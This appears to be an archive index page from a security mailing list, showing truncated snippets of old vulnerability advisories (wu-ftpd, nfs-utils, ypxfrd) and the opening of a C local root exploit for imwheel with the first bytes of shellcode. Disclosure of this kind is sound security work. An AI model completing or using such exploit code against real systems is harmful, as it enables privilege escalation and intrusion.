wu-ftpd fb_realpath() off-by-one bug

2003-07-31 Thread Janusz Niewiadomski
466 Author: Wojciech Purczynski <[EMAIL PROTECTED]> Janusz Niewiadomski <[EMAIL PROTECTED]> Date: July 31, 2003 Issue: == Wu-ftpd FTP server contains remotely exploitable off-by-one bug. A local or remote attacker could exploit this vulnerabili

Linux nfs-utils xlog() off-by-one bug

2003-07-14 Thread Janusz Niewiadomski
hor: Janusz Niewiadomski <[EMAIL PROTECTED]> Date: July 14, 2003 Issue: == Linux NFS utils package contains remotely exploitable off-by-one bug. A local or remote attacker could exploit this vulnerability by sending specially crafted request to rpc.mountd daemon.

Multiple vendor ypxfrd map handling vulnerability

2002-10-10 Thread Janusz Niewiadomski
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Name: ypxfrd Version:read the details CERT vulnerability note:http://www.kb.cert.org/vuls/id/538033 Author: Janusz Niewiadomski <[EMAIL PROTECTED]>

Re: [RHSA-2000:016-02] [...] exploit

2000-04-25 Thread Janusz Niewiadomski
/* * imwheel local root exploit [ RHSA-2000:016-02 ] * funkysh 04/2000 [EMAIL PROTECTED] */ #include #include #define BUFFER 2070 #define NOP 0x90 #define PATH "/usr/X11R6/bin/imwheel-solo" char code[]="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46" "\x07\x89\x46\x0c\xb0\x0b\x89\x